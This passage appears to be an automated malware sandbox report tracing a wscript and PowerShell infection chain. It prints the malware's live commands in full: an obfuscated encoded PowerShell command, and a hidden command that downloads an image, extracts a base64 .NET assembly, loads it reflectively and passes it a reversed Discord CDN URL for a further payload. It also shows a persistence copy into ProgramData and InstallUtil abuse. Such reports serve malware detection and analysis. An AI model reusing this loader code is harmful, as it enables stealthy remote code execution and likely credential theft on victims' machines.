('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
